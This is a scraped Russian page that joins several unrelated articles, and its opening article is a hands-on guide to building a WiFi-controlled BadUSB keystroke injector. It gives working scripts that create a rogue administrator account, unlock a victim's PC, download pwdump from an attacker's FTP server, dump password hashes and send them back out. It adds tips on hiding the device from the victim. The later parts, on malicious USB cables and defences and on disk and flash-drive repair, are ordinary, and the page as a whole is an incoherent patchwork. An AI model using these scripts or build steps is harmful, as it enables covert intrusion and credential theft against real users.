Bad usb своими руками: BadUSB Rubber Ducky своими руками

Содержание

BadUSB Rubber Ducky своими руками

Не для кого не секрет, что хакеры используют для атак небольшие устройства, внешне очень похожие на внешний USB-накопитель (флешку) называемые BadUSB. Чтобы заполучить удаленный контроль нужно всего навсего подключить такое устройство к серверу (компьютеру). Для начала все очень похоже на Rubber Ducky, за одним большим исключением, Rubber Ducky — это разовая акция, последствия которой весьма предсказуемы. Мы же хотим рассказать о гораздо более универсальной модификации BadUSB.

Еще по теме: Хакерская флешка своими руками

Хочу подчеркнуть, что ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи, т.к. она предназначена только для профессиональных пентестеров, руководителей службы CISO (информационной безопасности), а так же для «белых хакеров».

Лучше, чем Rubber Ducky

Наверняка вы уже слышали про Rubber Ducky. Это устройство из разряда BadUSB для HID-атаки. Подобного рода девайсы умеют эмулировать клавиатуру и позволяют отправить любые команды, словно их набрал текущий пользователь.

В этих устройствах есть простой микроконтроллер и память, в которую записывается скетч (код для Arduino и подобных отладочных плат). Он содержит функцию эмуляции нужного устройства и набор выполняемых им действий. Как показывает практика, обычно это клавиатура и последовательность «нажимаемых» на ней клавиш.

Конечно, у этих девайсов есть и свои недостатки. Во-первых, нужно тщательно разведать полную конфигурацию компьютера-жертвы. Во-вторых, перед реальной атакой нужно проверить, как она будет выполняться на максимально подобной тестовой системе, и внести необходимые правки — в частности, подобрать оптимальные задержки. В реальных условиях, скорее всего, будет проблематично второй раз приблизиться к атакуемому компьютеру, а если хоть один скан-код клавиши будет отправлен не вовремя, то все окажется напрасным. В-третьих, можно использовать только один скетч. Нельзя дописать какую-то функцию на лету или прервать и перезапустить набор действий. В этой статье я покажу как создать устройство, лишенное этих недостатков.

Создание WiFi Ducky

Практически это будет тот же самый Rubber Ducky, только с модулем WiFi. Суть в том, что при его подключении к компьютеру скетч не выполняется сразу при подаче питания на плату (хотя такая функция тоже есть). В этот момент создается точка доступа, которая ждет подключения. Соединиться с ней можно как со смартфона, так и с ноутбука и уже оттуда в любой удобный момент совершать необходимые действия.

За основу можно взять Arduino MKR1000 с WiFi-модулем Atmel ATSAMW25 на борту, добавить библиотеку WiFi101 и готовый код отсюда. Однако обойдется это в 35 долларов. Также есть готовый проект Cactus WHID. Он стоит уже 14 долларов и выглядит как флешка, но доработать его будет сложнее.

Я предлагаю собрать более дешевый (меньше десяти долларов) и функциональный девайс под называнием WiFi Ducky. Его автор — Stefan Kremser с ником «Космокурица», а железо для его крутых самоделок продается в отдельном магазине на AliExpress. Там можно купить готовые DIY-модули, скачать код с гитхаба и повторить все шаг за шагом, однако мы пойдем немного другим путем.

Возьмем два устройства:

Arduino Pro Micro;

Arduino Pro Micro

WeMos D1 mini с микроконтроллером ESP-8266EX и WiFi-модулем стандарта 802.11b/g/n на борту.

WeMos D1 mini

Нам необходимо будет соединить их, но вначале — прошить.

Все описанные действия выполнялись на операционной системе Windows 7 x64.

Прошивка Arduino Micro Pro

Начнем с платы Arduino. Скачиваем и устанавливаем Arduino IDE. При установке этого программного обеспечения заодно установятся все драйверы для этого устройства, так что дополнительно ничего не надо будет устанавливать. Чтобы подключить ее к компьютеру, необходимо запастить OTG-адаптером или кабелем с надлежащими выходами, так как на плате расположен разъем mini-USB.

После установки программного обеспечения запускаем его и подключаем Arduino к компьютеру. В меню «Инструменты» в разделе «Плата» выбираем Arduino/Genuino Micro. Далее в том же меню выбираем COM-порт, на котором определено устройство. На этом настройка программного обеспечения завершена.

Следующим шагом идем по ссылке, где расположен скетч. На него достаточно взглянуть, чтобы понять, что он делает: преобразует команды типа STRING в поддерживаемый Arduino синтаксис типа Keyboard.print(“”), и активирует нужные контакты. Копируем его и вставляем в Arduino IDE. Нажимаем кнопку «Загрузка» и через две-три минуты получаем сообщение о том, что скетч успешно загружен. Теперь при подаче питания на плату контроллер активирует контакты TX, RX, GND и RAM, после чего переходит в режим ожидания команд.

Прошивка WeMos D1 mini

Добрались до следующего компонента нашего BadUSB на стероидах. В этот раз нам потребуется перейти с micro-USB на USB Type-А. При первом подключении к компьютеру Windows ругнется на неопределенное устройство, поэтому необходимо скачать драйвер Ch441 c официального сайта.

Тут ничего сложного: извлекаем из архива EXE-файл, запускаем его с правами администратора и нажимаем INSTALL. После этих нехитрых манипуляций в диспетчере устройств эта плата должна определиться как USB-SERIAL СР340. Поделюсь горьким опытом: если установить неверный драйвер, то устройство определится, но название будет другое, и ничего не заработает. Будьте предельно внимательны!

Правильное определение WeMos D1 mini

Теперь устройство готово к прошивке, и нам нужен прошивальщик. Я воспользуюсь NodeMCU firmware programmer. Заходим на GitHub и скачиваем его в соответствии с версией вашей ОС. У меня это Win64. Еще необходимо скачать саму прошивку. Их будет несколько вариаций, я скачивал esp8266_wifi_duck_4mb.bin, как наиболее увесистый и функциональный вариант.

После этого запускаем и настраиваем прошивальщик. В поле COM Port выбираем тот порт, на котором определилась плата. Обычно программа сама его «видит» и подставляет необходимое значение. Далее переходим во вкладку Config, где в первой строке нажимаем на шестеренку и указываем путь до прошивки, которую скачали. Значение остается 0x00000. Во вкладке Advanced советую выставить параметр Baudrate на 115200. У меня прошивка записалась на такой скорости, а если у вас возникнет ошибка, то просто уменьшите ее. Остальное оставляем без изменения. В итоге должно получиться как на скриншоте.

Значения программы NODEMCU FIRMWARE PROGRAMMER на вкладке Advanced

Когда все нехитрые манипуляции будут выполнены, возвращаемся на вкладку Operation и нажимаем Flash. Ниже кнопки расположен индикатор, который покажет приблизительное время загрузки прошивки в память, а зеленая галочка с надписью NODEMCU TEAM даст знать, что прошивка закончилась.

Работа паяльником

После того как обе платы подготовлены и прошиты, необходимо соединить их в одного «Франкенштейна». Для этого подключаем проводами контакты в соответствии с таблицей:

Arduino <—> Wemios

TX      <—> RX

RX      <—> TX

GND     <—> GND

RAM     <—> 5U

Для начала лучше соединить их без пайки (на монтажной плате очень удобно) и проверить работоспособность. Подключаем к компьютеру Arduino Micro Pro и тестируем. Если устройство завелось и работает как надо, то можно собирать его уже с припоем. Мелких деталей там нет, перегреть особо нечего, так что получится даже у того, кто недавно поссорился с паяльником.

Вот как получилось у меня.

Как примерно должно получиться

Проверка BadUSB WiFi Ducky

Самое время проверить, не сломалась ли какая-то из плат во время пайки. Подключаем Arduino Micro Pro к компьютеру и ждем, пока установится универсальный драйвер для HID-устройства. «Ардуина» должна сигнализировать двумя красными и одним зеленым светодиодами.

С телефона, планшета или ноутбука смотрим список точек доступа WiFi. Должна появиться новая AP под названием WiFi Duck. Если ее видим, значит, все работает.

Точка доступа WiFi Duck

Подключаемся к ней. Пароль — quackquack (это пароль по умолчанию, его можно будет изменить в настройках). Теперь открываем браузер, идем по адресу 192.168.4.1 (это дефолтный адрес ESP-8266EX в режиме AP) и видим панель управления нашим устройством.

Функционал BadUSB WiFi Ducky

На web-интерфейсе все по-спартански, ничего лишнего. Четыре страницы, или вкладки, — две рабочие и две информационные:

Scripts. Эта вкладка предназначена для работы с уже готовыми скриптами. Изначально она пуста, но кнопкой UPLOAD NEW SCRIPT можно загрузить написанный скетч в форматах .ino и .txt из памяти устройства (с которого зашли), после чего выполнить его в любое удобное время. Можно скрипты писать самому или найти в интернете готовые решения, например тут. Не все из них рабочие, необходимо будет заранее протестировать (оболочка позволяет редактировать их). Памяти на все это дело предостаточно — почти 3 Мбайт.

Страница Scripts

Live Execute. На этой странице расположено поле, в которое мы пишем скетч. Его можно сразу выполнить или сохранить. При сохранении он отобразится на странице Scripts. Язык написания скетча отличается от привычного в Arduino, поэтому ниже поля для ввода дана инструкция с командами и описанием каждой из них.

Страница Live Execute

Settings. Это страница настроек точки доступа. Тут можно поменять название точки доступа, пароль, сделать ее скрытой. Также можно указать скрипт, который будет выполняться сразу при подключении устройства к компьютеру.

Страница Settings

Info. Эта страница больше носит информационный характер. Тут находится ссылка на автора проекта, SDK, веб-сервер, скрипты и их интерпретатор. Можно также обновить версию прошивки ESP8266 «по воздуху»

Страница Info

Написание скриптов для атак

Наше кибероружие подготовлено и начищено, осталось зарядить его скриптами. Обратите внимание на расстановку пауз в них (DELAY). Они нужны для того, чтобы код не начал выполняться слишком рано — прежде, чем целевой компьютер успеет на него отреагировать. Советую делать паузы побольше, исходя из того, что система жертвы будет медленней вашей тестовой. Это может быть из-за отсутствия на ней SSD, меньшего объема оперативки, медленного процессора и так далее.

Смоделируем такую ситуацию: WiFi Ducky уже подключен к цели, а мы находимся где-то неподалеку. В системе есть учетная запись пользователя с правами локального администратора, и она сейчас активна. Нам необходимо выполнить какое-то действие. Для начала создадим скрипт, который создаст еще одного пользователя и добавит его в группу «Администраторы».

GUI r

STRING cmd

ENTER

DELAY 100

STRING net user hacker qwerty /add

DELAY 200

STRING net localgroup administrators hacker /add

ALT KEY_F4

Если скетч запустится с правами учетной записи обычного пользователя, то появится сообщение: «Системная ошибка 5. Отказано в доступе». Под админом он выполнится менее чем за полсекунды, после чего окно консоли закроется.

Для русифицированных версий Windows придется указать имя группы «Администраторы» по-русски: net localgroup Администраторы hacker /add. Однако для этого потребуются дополнительные действия.

Отлично, теперь необходимо дождаться, пока пользователь заблокирует компьютер и уйдет, к примеру, на обед. Запускаем скрипт, который разблокирует компьютер под нашим пользователем:

TAB

DELAY 30

TAB

DELAY 30

ENTER

TAB

DELAY 30

TAB

DELAY 30

ENTER

Вуаля! Мы работаем за компьютером жертвы без его ведома с новой учетной записью. Конечно, если в системе всего две учетные записи — исходная и наша.

Далее, к примеру, можно загрузить с заранее подготовленного FTP-сервера pwdump:

GUI r

DELAY 30

STRING cmd

ENTER

DELAY 30

STRING echo open > ftp.txt & echo ip-ftp >> ftp.txt & echo user >> ftp.txt & echo password >> ftp.txt & echo get pwdump.exe >> ftp.txt & echo bye >> ftp.txt

ENTER

DELAY 50

STRING ftp –s:ftp.txt

DELAY 3000

После чего мы можем сдампить хеши паролей:

STRING pwdump.exe >> pass.txt

…и загрузить файл обратно на сервер:

STRING echo open > ftp1.txt & echo ip-ftp >> ftp1.txt & echo user >> ftp1.txt & echo password >> ftp1.txt & echo send pass.txt >> ftp1.txt & echo bye >> ftp1.txt

DELAY 50

STRING ftp –s:ftp1.txt

Останется воспользоваться радужными таблицами для расшифровки, и мы уже владеем учетными записями для продолжения атаки. Устройство все еще в компьютере, и делать мы можем что угодно в радиусе приема «злого WiFi».

Дорабатки и усовершенствования Bad USB WiFi Ducky

Получился довольно неплохое хакерское устройство, но нет предела совершенству. Приведу несколько примеров того, как можно доработать наш BadUSB.

Чтобы устройство не светилось, как гирлянда, в чужом компьютере, можно заменить светодиоды перемычками или закрасить их лаком для ногтей (в несколько слоев). Две отладочные платы на торчащих проводах явно вызовут подозрения, поэтому неплохо было бы подобрать или изготовить для них корпус.

Если будет возможность не просто подобраться к системному блоку, а вскрыть его, то неплохо было бы обзавестись кабелем, который подключается к материнской плате напрямую. Это сильно уменьшит шансы того, что устройство в скором времени обнаружат.

Если устройство будет внутри системного блока, то можно воспользоваться D1 mini Pro V1.1.0, так как у нее есть разъем под внешнюю антенну — она увеличит радиус действия.

Защита от BadUSB WiFi Ducky

Защититься от такого девайса можно точно так же, как и от Rubber Ducky: необходимо заблокировать добавление нового HID-устройства средствами операционной системы либо комплексными системами защиты (Kaspersky, HEAT Software и прочие Endpoint Security).

Заключение

Мы сделали усовершенствованную модель Bad USB Rubber Ducky — WiFi Ducky. Это довольно опасное хакерское устройство размером со спичечный коробок, причем его создание не требует больших вложений. Возможность изготовить его самостоятельно сильно облегчается наличием готовых плат Arduino и скетчей для них.

По-хорошему отладочные платы используют именно для прототипирования, а в дальнейшем разводят уже свою плату с тем же микроконтроллером и модулем WiFi, но без лишних элементов. Ее изготовление можно заказать на заводе. Например, здесь доступно мелкосерийное производство от пяти долларов, и подобных сервисов много.

Можно записать в память WiFi Ducky скрипты, а затем выполнять их в любое время и на любой операционной системе — встроенной памяти хватит на тысячи строк кода. Дистанционное управление добавляет устройству универсальности по сравнению с локальными девайсами класса BadUSB. С ним можно делать на удаленном компьютере что угодно, словно вы сами сидите за его клавиатурой.

Это будет уже не спайка двух отладочных плат, торчащая из USB-порта, а серьезный WiFi Ducky — более миниатюрный и надежный, не привлекающий внимания.

Еще по теме: Лучшие устройства хакера

Никогда не пользуйтесь чужим зарядником для смартфона. Ваши данные могут похитить

В чём опасность

Времена, когда смартфоны и планшеты имели отдельные разъёмы для зарядного устройства и передачи данных, давно прошли. Сейчас все гаджеты заряжаются через USB-кабели, которые передают и информацию, и электроэнергию. Это удобно и практично, но такое положение вещей открывает кибервзломщикам новые возможности.

На ежегодной конференции DEF CON взломщик по имени Майк Гровер, известный под псевдонимом MG, показал созданный им поддельный кабель Apple Lightning для iPhone. По виду его не отличить от обычного, однако внутри спрятан специальный чип с модулем беспроводной связи.

Он выглядит как оригинальный кабель и работает так же. Даже ваш компьютер не заметит никакой разницы. Пока я, злоумышленник, не возьму над ним контроль по беспроводной связи.

Майк Гровер в интервью Motherboard

После того как жертва подключит свой смартфон к компьютеру через поддельный кабель, хакер сможет получить полный доступ к системе. MG утверждает , что шнур одинаково работает с Windows, macOS и Linux, а также может использоваться для взлома мобильных устройств. Управлять таким гаджетом можно через приложение, написанное хакером.

И пусть владельцы Android не обольщаются: под угрозой не только iPhone.

Кабели Apple модифицировать сложнее всего. Поэтому, если мне удалось встроить чипы в них, то я с лёгкостью справлюсь и с другими зарядными устройствами.

Майк Гровер

Хакер может подключаться к смартфонам, в которые воткнули такой кабель, на расстоянии 90 метров. Но модифицированное устройство можно настроить и так, чтобы оно подключалось к ближайшей беспроводной сети, так что расстояние вообще может быть неограниченным.

Майк Гровер создал пробную партию кабелей под названием O.MG, которую успешно распродал по 200 долларов за штуку. Примечательно, что все их он собрал на собственной кухне буквально на коленке. В будущем Гровер намеревается поставить производство на поток и продавать свои кабели за 100 долларов всем желающим.

Updated blog to answer the most common questions on #OMGCable: https://t.co/Zd8S5ckSEL

Highlights:
— Prototype owners can now apply to the private community.
— Those who want the production cables can sign up on @Hak5‘s site: https://t.co/mVYIMD3v7g

— _MG_ (@_MG_) August 12, 2019

Майк Гровер не единственный, кто догадался использовать для взлома поддельные USB-кабели. Год назад Кевин Митник разработал аналогичное устройство под названием USBHarpoon, выглядящее как обычный зарядный шнур. Принцип действия его тот же.

Винсент Ю, коллега Митника, показал, как работает USBHarpoon. Он подзарядил свой беспилотник от ноутбука через скомпрометированный USB-кабель, и тот немедленно начал выполнять на компьютере заложенные в нём команды.

Подобные истории не новы. У хакеров даже появилось жаргонное выражение Juice Jacking — «выжимание сока». Вы подключаете свой телефон по USB к одной из общественных зарядных станций, модифицированных хакером, и на ваше устройство передаётся зловредный код.

Подключиться к общедоступному USB-порту — это всё равно что найти зубную щётку на обочине дороги и засунуть её себе в рот. Вы же понятия не имеете, где эта штука побывала.

Калеб Барлоу

вице-президент X-Force Threat Intelligence в IBM Security

Ещё в 2011 году на конференции DEF CON Брайан Маркус, президент Aires Security, продемонстрировал зарядную USB-станцию, созданную им с коллегами. Она воровала с подключавшихся к ней смартфонов личные данные пользователей, контакты, переписку, ПИН-коды, пароли и даже интимные фотографии.

Прототип этой станции тогда простоял на DEF CON три с половиной дня, и 360 ничего не подозревающих посетителей подключались к нему. Нет ничего проще, чем установить такую же штуковину в гостинице, супермаркете или аэропорту.

Как защититься

Существуют переходники USB Condom, которые призваны защитить устройства от заражения вредоносным кодом и кражи данных. Однако Майк Гровер продемонстрировал, что его кабелю они не страшны.

#3 — BadUSB Cables wouldn’t be complete without BadUSB Condoms.

Tempted to get a run of these made for the vendor area at the next security con. pic.twitter.com/Iq8HHSV7qG

— _MG_ (@_MG_) January 13, 2018

Что же делать?

  • Пользуйтесь только своим кабелем от смартфона. Оригинальным, созданным производителем устройства.
  • Если необходимо подзарядиться, подключайтесь не к другим гаджетам через USB, а к розеткам при помощи специального адаптера. Специалист из Authentic8 Дрю Пайк утверждает , что они точно безопасны.
  • Не подключайтесь к общественным зарядным станциям.

Соблюдайте эти нехитрые правила, и даже если среди ваших знакомых затесался хакер, он вам ничего не сделает.

Читайте также 🧐

Digispark начало работы Atiny85 или на что способна маленька платка BadUSB хацкеры

Digispark начало работы Atiny85 или на что способна маленька платка BadUSB хацкеры — /

Digispark начало работы Atiny85 или на что способна маленька платка BadUSB хацкеры

Как разобрать и диагностировать неисправность павербанка, самые типичные проблемы

11:18

6 интересных товаров для радиолюбителя с Aliexpress до 11.11

17:36

Транзисторы и их применение. Небольшой, но интересный фильм времён СССР

15:27

Samsung WF1702 washing machine E-03 hacked with Arduino MKR

0:32

Удивительные самоделки на Raspberry PI, 11 интересных проектов на малине.

7:42

DIY Arduino Balancing Led strip

4:16

Полупроводниковые и диэлектрические материалы в электронной технике (мини фильм)

19:42

How to make Homework Machine at Home

10:07

Testing the assistive belt (test 2)

0:43

Транзисторы и их применение. Небольшой, но интересный фильм времён СССР

15:27

Ты+Я=Друзья

1:06

Интересный мини фильм про трансформаторы, производство и их применение

17:00

Видео слайды 1

0:09

Beating LED Heart

0:34

Робот бармен или наливатор? Рецепт автоматического дозатора с тостами на Arduino

12:27

DIY segway with Arduino — second version

1:08

How to make Homework Machine at Home

10:07

Фильм «Основные физические понятия технической электродинамики»

19:14

Подборка новых интересных устройств собранных на Ардуино DIY ( Arduino CNC )

15:53

Arduino Security System with Password and magnetic door sensors

2:28

Ремонт компьютерных наушников. После этого приобретают новый вид!

6:54

GoodBoy Robot Dog

1:27

Mining Bitcoin on the Game Boy

8:35

Ремонт наушников своими руками , советы как правильно сделать + схемы и распайки

8:08

Аккумуляторный RGB свет на адресных светодиодах WS2812 с разными эффектами

7:31

Квадрокоптер Hubsan x4 107c

1:19

Acrilight

1:14

Синхронные машины, принцип действия и устройство трехфазных синхронных машин

40:26

Зарядить аккумуляторы любой ценой! Обзор Liitokala Lii 500 на 4 канала

10:14

Развлекатор для кота

0:29

RGB-lignt TV

0:52

Фрезерные станки, фильм от «Кинокурс» СССР

18:29

Как подключить аппаратуру Radiolink RC4GS к пк для работы с эмулятором

8:34

Arduino +servo+photoresistor

0:33

Using Ninjutsu Hand Signs (Naruto) To Unlock My Safe

12:29

Квадрокоптер муви FPV , запись с камеры на борту

7:02

Альтернативная Энергетика\Анбоксинг солнечных элементов (100w)

1:18

Demo Mosquitto

0:11

10 проектов ардуино за 4 минуты arduino projects 10 top

4:33

Сейф на Arduino UNO и RFID

6:58

Ремонт внешнего жёсткого диска

Жёсткий диск является важной частью компьютера, ведь именно на нём пользователи хранят свои файлы и данные. Если недостаточно встроенного ЖД, можно приобрести внешний HDD, на котором можно держать всё что угодно. Сбои в работе ЖД случаются нечасто, однако всегда очень сильно волнуют пользователей, ведь появляется риск потерять огромное количество важных данных и ценных файлов. В этой статье рассмотрим, как самостоятельно сделать ремонт жёсткого диска. Давайте разбираться. Поехали!

Прежде всего необходимо понимать, что ремонт ЖД не подразумевает восстановление данных с него, при этом восстановление в принципе не всегда возможно, всё зависит от степени и характера поломки. Сперва давайте разберёмся какие же существуют предпосылки для ремонта внешнего HDD:

  • Жёсткий диск издаёт нехарактерные звуки во время работы. Это может быть скрип, шуршание или треск.
  • Внезапное, беспричинное исчезновение файлов и папок.
  • «Тормоза» и «глюки» при обращении к диску.

Стоит отметить, что сами по себе ЖД выходят из строя довольно редко и причиной этому может быть только заводской брак. В остальных случаях ответственность за поломку возлагается на самого пользователя. Именно неправильная эксплуатация и доводит жёсткий диск до нерабочего состояния. Периодически следует выполнять проверку на сбойные секторы, bad-блоки, запускать процедуры дефрагментации и диагностики, а также контролировать температуру работающего устройства. Невыполнение какого-либо из этих пунктов рано или поздно приводит к поломке устройства.

Итак, если ваш внешний ЖД во время работы издаёт какие-то странные звуки, то, вероятнее всего, проблема в записывающей головке, которую, к сожалению, самостоятельно заменить не получится. Но вы можете предпринять необходимые меры и сделать резервную копию диска, чтобы не потерять все данные. Имейте в виду, что ЖД не обязательно должен работать бесшумно. Речь идёт только о необычных и подозрительных звуках.

Начинать диагностику и ремонт следует с проверки исправности USB-кабеля. Можно подсоединить кабель к другому устройству, чтобы определить его работоспособность.

Если компьютер видит подключенный внешний ЖД, но во время работы с ним появляются различного рода зависания, вылеты и ошибки, то необходимо запустить проверку жёсткого диска на наличие вредоносного программного обеспечения, проще говоря, на вирусы.

После этого диск необходимо отформатировать. Обратите внимание, что форматирование обязательно должно быть полным, а не быстрым. Выбор утилит, позволяющих это сделать, довольно большой: Acronis Disk Director, HDD Low Level Format и другие. Конечно же, в этом случае все файлы, хранящиеся на диске, будут удалены. Запустить форматирование можно несколькими способами:

Если ПК обнаруживает внешний жёсткий диск, но из него не удаётся извлечь информацию, проверьте, какая её часть имеет сильные повреждения, а какая поддаётся восстановлению. Для этого вам понадобится утилита Recuva, Partition Recovery. После запуска этой программы вы увидите список файлов, которые поддаются восстановлению. Все «битые» данные остаётся просто удалить.

Если вы решили самостоятельно разобрать и отремонтировать жёсткий диск, вот инструкция, которая поможет вам сделать это правильно:

  1. Открутите плату контроллера. Для этого вам понадобится крестообразная отвёртка. Имейте в виду, что этим вы лишаете себя гарантии. На определённых моделях жёстких дисков элементы расположены с внешней стороны так, что их можно рассмотреть, не откручивая плату.
  2. Внимательно изучите плату. Посмотрите имеются ли на ней какие-либо повреждения. Довольно часто на микросхемах можно обнаружить нагар или вспучивания, которые образуются из-за перегрева. Воспользуйтесь лупой, чтобы детально изучить места пайки разъёмов. Имейте в виду, что даже одна отошедшая ножка может крайне негативно повлиять на работу ЖД целиком. В случае обнаружения чего-либо подобного можете не беспокоиться, так как это можно легко и быстро исправить. Нужно просто найти артикул либо наименование платы, подходящей для вашего устройства, в интернете. После чего купить её и установить.
  3. Помните, что пыль на контактах может вывести из строя винчестер или сбить поток сигналов, которые идут от материнской платы и наоборот. Чтобы почистить электрическую плату, возьмите обыкновенный ластик, спирт и ватные палочки. Действуйте осторожно, чтобы не залить контакты, поскольку это может привести к полному выходу из строя.
  4. Если чистка шлейфов и платы контроллера прошла удачно и принесла плоды, выполните дефрагментацию диска и реестра.

Теперь вы знаете, как отремонтировать внешний жёсткий диск своими руками в домашних условиях. Пишите в комментариях удалось ли вам успешно починить свой ЖД, делитесь собственным опытом и советами с другими пользователями, а также задавайте свои вопросы, если в чём-то не разобрались.

Взлом, уничтожение и кибершпионаж через USB-кабели.

 Мне бы крайне не хотелось, чтобы читатели курса впадали в какие-то крайности и паранойи, тем не менее комплексная безопасность предполагает осведомленность обо всех угрозах, одна из которых – USB-кабели. В этой главе мы будем разбираться, как они могут становиться инструментами атаки.

 Незадолго до публикации этого материала появилась новость, что Майк Гровер, специалист в сфере IT-безопасности, разработал вредоносный USB-кабель, который может по Wi-Fi принимать команды от злоумышленника и передавать их на устройство жертвы от имени клавиатуры. К чему может привести подобная атака, читайте в этой главе.

  Свою разработку Майк Гровер назвал 0-MG, и она равно эффективна против устройств под управлением Linux, macOS и Windows, но главная проблема в том, что это не уникальная приватная разработка, такие устройства давно существуют, и их может приобрести любой желающий, например на AliExpress.

 Давайте разберем, какие угрозы может нести подключение вредоносного USB-кабеля.

Уничтожение устройства

 Мы уже писали про USB-флешки, которые при подключении выводят из строя компьютер. Ничто не препятствует сделать USB-кабель с аналогичным принципом работы.

 Не стоит недооценивать эту атаку, иногда вывести компьютер жертвы из строя – желанная цель. Но это вы знаете причину и решение, а жертва с высокой долей вероятности потратит время на поиск причины, приглашение специалиста, поиск и покупку совместимого компонента и последующую установку. В некоторых случаях подобный процесс может занять недели.

 В сети вы можете найти различные устройства, которые представляют себя как защита USB-порта, так называемые USB Condom. Некоторые из них, по заверениям продавцов, защищают от USB-киллеров, хотя это и не является их основной задачей.

Заражение устройства

 Напоминаю, что зарядное устройство в большинстве случаев подключается к USB-порту, а значит, возможно проведение атаки BadUSB со всеми вытекающими последствиями. 

 За примерами далеко ходить не надо, знакомьтесь: USBHarpoon.

 Это устройство разработано при поддержке известного специалиста в сфере IT-безопасности Кевина Митника. Оно способно заражать компьютеры Linux, macOS или Windows после подключения кабеля к разблокированному устройству. Данная атака имеет только один минус: пользователь увидит подозрительную активность на экране своего компьютера, например вызов консоли и ввод команд.

 Как вы можете догадаться, достать подобную игрушку не шибко сложная задача, которая посильна не только спецслужбам, но и частным компаниям, занимающимся промышленным шпионажем.

 К счастью, против подобных атак есть эффективная защита – USB Condom, о котором уже говорилось выше. Он не позволит кабелю взаимодействовать с компьютером, за исключением передачи электроэнергии. Иными словами, с помощью подобного кабеля можно будет зарядить телефон и ничего более. 

 Приобрести USB Condom вы можете на Amazon (тут или тут).

 

Совет

Приобретите USB Condom для защиты от атак типа BadUSB.

 К сожалению, если USB-кабель нужен вам для передачи данных, USB Condom использовать не получится, а иной эффективной защиты от данной атаки нет. Некоторые разработчики антивирусов утверждают, что их продукт защищает от атак BadUSB. Однако исследования не подтверждают этого.

Шпионаж

 Через USB-кабель можно шпионить, внедрив в него диктофон и/или GPS-трекер – устройство, позволяющее отслеживать местонахождение кабеля и, следовательно, владельца. В случае с диктофоном кабель передается жертве, и дальше атакующий прослушивает все, что обсуждается около компьютера или иного устройства, к которому подключается кабель.

 Преимущество подобного устройства – регулярный доступ к питанию, если кабель используется, а значит, длительная и стабильная работа. Из минусов – качество, так как качественный микрофон внедрить в USB-кабель практически невозможно.

 Передача собранных диктофоном данных, как правило, осуществляется через встроенную сим-карту. Так работает 99% устройств, так как иные способы трудны в реализации.

 Подобные игрушки можно приобрести даже на AliExpress. Вот, например, кабель с GPS-трекером.

 Основной инструмент защиты в данном случае – устройство для обнаружения сигналов, которое способно выявить использование радиомодуля для передачи данных и иные сигналы. Подобные устройства можно найти в свободной продаже, в том числе все на том же AliExpress.

Разумная осторожность

 Если вы простой пользователь сети, маловероятно, что за вашими данными будут серьезно охотиться, потому эта угроза для вас является больше теоретической. А вот бизнесменам, журналистам, политикам, чиновникам, общественным деятелям и членам их семей стоит всерьез обеспокоиться.

 Описанные выше инструменты для шпионажа доступны не только спецслужбам, но и любому желающему. Атака не требует каких-то сверхзнаний или сверхусилий, невероятной компетентности атакующего или нелепой ошибки жертвы.

 Первым разумным шагом будет отказ от покупки устройств и комплектующих с доставкой на свое имя. Сходите в магазин и приобретите случайное устройство, это практически исключит риск, что вам будет продано вредоносное устройство для адресной атаки.

 

Совет

Приобретайте устройства рандомно в магазине вместо адресного заказа на свои данные.

 Ну и конечно, если у вас что-то сломается, ни в коем случае не сдавайте технику в сервис. Почему этого не стоит делать, я уже рассказывал в главе о кибершпионаже через центры ремонта компьютерной техники и мобильных устройств. 

 Если вы подключаете стороннее устройство для зарядки от вашего компьютера или, наоборот, свой телефон заряжаете от сторонних устройств, USB Condom должен быть всегда у вас под рукой.

 А если вы лицо, в адресном кибершпионаже за которым могут быть заинтересованы, лучше иметь еще и устройство для обнаружения скрытых источников сигнала и проверять им все комплектующие, включая кабели. 

Восстановление загрузочного сектора флешки. Программы для восстановления флешек

Лекарство для Флешки! (софт ремон BAD блоков)

Доброго времени суток!
Причиной написания данной статьи стали две мои флешки Kingston.
Одна из них довольно долго не использовалась и когда я решил ее воспользоваться оказалось, что записать данные на нее не возможно! С помощью утилиты HD Tune 3.5 было выяснено, что приличная часть поверхности помечена как не читаемая! Попытки форматирования средствами Windows ни к чему не привели, по причине того что при форматировании флешки создается только служебная информация. Требовалось низкоуровневое форматирование, утилита для этого была найдена без проблем с помощью Google. Произведен формат и она заработала.
Несколько дней назад при попытке копирования исходников со второй флешки было выдано сообщение, что невозможно скопировать вот такие то файлы. Причем удалить эти файлы можно было! Первая мысль – появились BAD блоки.
Проверка флешки с помощью HD Tune 3.5 не выявила BAD ов!

Причина не читаемости файлов несколько дней оставалась не выявленной, до тех пор пока не наткнулся на утилиту HDD Scan 3.2.



Проведенные с ее помощью тест поверхности сразу выявил наличие BADов, чем собственно и объяснялась не читаемость файлов! Кроме того сразу стала ясна причина провалов в скорости записи и чтения файлов, это сектора со временем доступа более 150 мс.







Для их устранения была использована, ранее найденная, утилита низкоуровневого форматирования HDD Low Level Format Tool.



После окончания форматирования был проведен тест поверхности с помощью все той же HDD Scan 3.2.







BAD блоки были устранены, так же удалось избавится от медленных секторов, что устранило провалы в скорости записи и чтения.

Вывод.
Использование утилиты HD Tune для теста поверхности не рекомендуется, выдает неверные результаты, поэтому лучше использовать другие утилиты, например HDD Scan или подобные.
Для лечения BAD блоков необходимо использовать утилиты низкоуровневого форматирования. Кроме устранения дефектных секторов позволяет устранить кластеры с большим временем доступа, что в итоге избавляет от провалов в скорости чтения и записи.
Используя подобный метод можно вернуть к работе вроде как не рабочие флешки, но стоит помнить что доверять подобным носителям уже не стоит, начавшийся процесс износа уже не остановить и со временем количество сбойных секторов будет расти и в конце концов наступит время когда носитель уже нельзя будет использовать! Время полного отказа зависит от интенсивности использования флешки!
Данную методика и набор софта можно использовать не только для флешек но и для жестких дисков, как переносных подключаемых через USB так и стационарных с интерфейсом IDE и SATA.

С уважением – StrateG-1.

Свое мнение высказываем

Пожалуй, каждый пользователь рано или поздно сталкивается с проблемой работоспособности флешки. Если Ваш съемный накопитель перестал нормально работать, не спешите его выбрасывать. При некоторых сбоях работоспособность можно восстановить. Рассмотрим все доступные способы решения проблемы.

Сразу стоит сказать, что все процедуры выполняются достаточно просто. Более того, проблему можно решить, даже не прибегая к каким-то необычным средствам, а обойтись только лишь возможностями операционной системы Windows. Итак, приступим!

Способ 1: Программа Check Flash

Этот софт эффективно проверяет работоспособность флеш-устройства.

  1. Установите программу. Для этого скачайте ее по ссылке выше.
  2. В главном окне программы выполните несколько простых действий:
    • в разделе «Тип доступа» выберите пункт «Как физическое устройство…» ;
    • для отображения вашего устройства, в поле «Устройство» нажмите на кнопку «Обновить» ;
    • в разделе «Действия» отметьте пункт « Стабильность чтения» ;
